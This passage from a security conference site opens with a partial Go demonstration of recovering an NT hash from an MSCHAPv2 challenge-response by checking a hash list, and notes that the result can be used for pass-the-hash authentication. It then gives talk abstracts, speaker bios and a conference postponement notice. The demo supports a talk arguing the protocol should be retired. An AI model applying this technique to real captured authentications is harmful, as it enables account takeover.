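	auth := mustHex("5b5d7c7d7b3f2f3e3c2c602132262628")
	peer := mustHex("21402324255e262a28295f2b3a337c7e")
	target := mustHex("44ebba8d5312b8d611474411f56989ae")
	chal := challengeHash(peer, auth, "User")
	resp := ntResponse(target, chal)

	// Constructed stand-in for a large NT hash list: arbitrary values, one of
	// which shares the real hash's tail 89ae and so survives the filter but
	// fails full verification.
	hashList := [][]byte{
		mustHex("00112233445566778899aabbccddeeff"),
		mustHex("0123456789abcdef0123456789ab89ae"),
		mustHex("8846f7eaee8fb117ad06bdd830b7586c"), // NT hash of "password"
		target,
	}
	match, tested := shuck(hashList, chal, resp)
	fmt.Printf("challenge=%x response=%x\n", chal, resp)
	fmt.Printf("recovered NT hash=%x after fully testing %d of %d candidates\n", match, tested, len(hashList))
}
```

<p>Note what the example does not need: no password guessing and no MD4 at all. Because the response is a pure function of the NT hash, a list of hashes is as good as a list of passwords, and once the tail is known only about one candidate in 65536 has to be checked with the three DES operations. The recovered NT hash can then be used directly in a pass-the-hash style MSCHAPv2 authentication, which is exactly why the abstract argues the protocol should be retired.</p>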
<p><em>About Dominic and Michael</em></p>
<ul>
<li><a href="https://twitter.com/singe">@singe</a> - Guy, Some @ Orange Cyberdefense’s SensePost team</li>
<li><a href="https://twitter.com/cablethief">@cablethief</a> - Random, Joe @ Orange Cyberdefense’s SensePost team</li>
</ul>
<h2 id="attack-and-defense-techniques-with-kubernetes---vignesh-c">Attack and Defense techniques with kubernetes - Vignesh C</h2>
<p>In modern environments the blue team has to face a lot of issues with container security. This talk aims to give an overall summary of Kubernetes security and common MITRE matrix scenarios. It also explains how to implement an end-to-end, fully hardened environment, which will help to securely monitor the cloud and containers.</p>
<p><em>About Vignesh</em></p>
<p>Vigneshc has a few security hall-of-fames and CTF wins. He has worked on a wide range of topics in security, including Red Teaming, Infrastructure Pentest, Purple Teaming, Forensics & Incident Response, Cyber Threat Intelligence, Cyber Footprint Assessment, and Application Pentesting. Pentester and just another guy who plays around with 0’s and 1’s.</p>
<h2 id="beyond-string-theory-symbolically-enhanced-reverse-engineering---keith-makan">Beyond String Theory: Symbolically Enhanced Reverse Engineering - Keith Makan</h2>
<p>Reverse engineering software from binary executable forms remains a key challenge for modern software analysis. Common techniques include running good old strings or grep and hoping for the best before trying to derive control flow graphs, call stacks and resolve cross references via complex disassembly frameworks. Beyond cursory string inspection, symbolic execution gives us the power to emulate execution, derive concrete test cases and prove reachability to interesting points in a static binary, and with Angr we can leverage that power in Python. In this talk the speaker will unpack basic concepts introducing symbolic execution in the Angr Framework and show methods to apply this to discovering content (secrets, log data, etc.) in ways strings or static inspection would be incapable of. The talk walks through examples from real world binaries including common utilities as well as CTF challenge binaries.</p>
<p><em>About Keith</em></p>
<p><a href="https://twitter.com/kmsecurity3">Keith Makan</a> is a security consultant with 6+ years of experience in delivering secure assessment of code and applications in various industries spanning companies across the globe. Keith has consulted at large businesses in software/internet based technologies and remains eager to learn new ways to assess and scrutinize modern applications. Keith’s expertise include Secure Code Review in various languages, Android and Web Application assessment, Network and Infrastructure assessment as well as a growing expertise in Reverse Engineering, Binary Analysis and Social Engineering.</p>
<p>During the span of his career he has published two books in the information security field namely, “The Android Security Cookbook” and “Penetration Testing with the Bash Shell”, and is currently pursuing his masters in Computer Science with a focus on Binary Symbolic Execution.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We look forward to seeing everyone at our event!</p>
0xcon
BSides 2021 Update: Postponement and reviewed Plans 2021-11-03T00:00:00+00:00 2021-11-03T00:00:00+00:00 https://hacksouth.africa/conferences/Bsides-Cape-Town-postponement
<p>Currently, there is a lot of uncertainty regarding Lockdown restrictions for the beginning of December as the inevitable fourth wave approaches.</p>
<h3 id="2021-conference-plans">2021 Conference Plans</h3>
<p>The plan was for a hybrid conference, but because of the lockdown uncertainty and, more importantly, since the previous BSIDES Cape Town took place in 2019 (2 years ago!), the organisers decided that an in-person conference would be superb. Therefore, the December 2021 BSIDES Cape Town conference has been postponed to March/April 2022 to allow for both an in-person conference and in-person workshops.</p>
<p>This extension does not change the plans for the December 2022 BSIDES Cape Town, which will still occur. In the meantime, to cure your BSIDES Cape Town withdrawal, you can find the recordings of previous talks on the <a href="https://www.youtube.com/c/BSidesCapeTown/videos">YouTube channel</a>.</p>
<p>The organisers will be in touch with the speakers in the coming weeks to confirm availability with the extension.
Instead of the conference, there will only be a small meetup on or around the 4th of December; we will give more information closer to the date.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We want to thank everyone who got in touch to volunteer and those who responded to the CFP; We will be in touch to check whether you can attend the meetup.
Please share this among the community so that everyone is aware!</p>
<p>If you have any specific questions or thoughts don’t hesitate to email the organisers at:<br />
<a href="mailto:organisers@bsidescapetown.co.za">organisers@bsidescapetown.co.za</a></p>
Megladon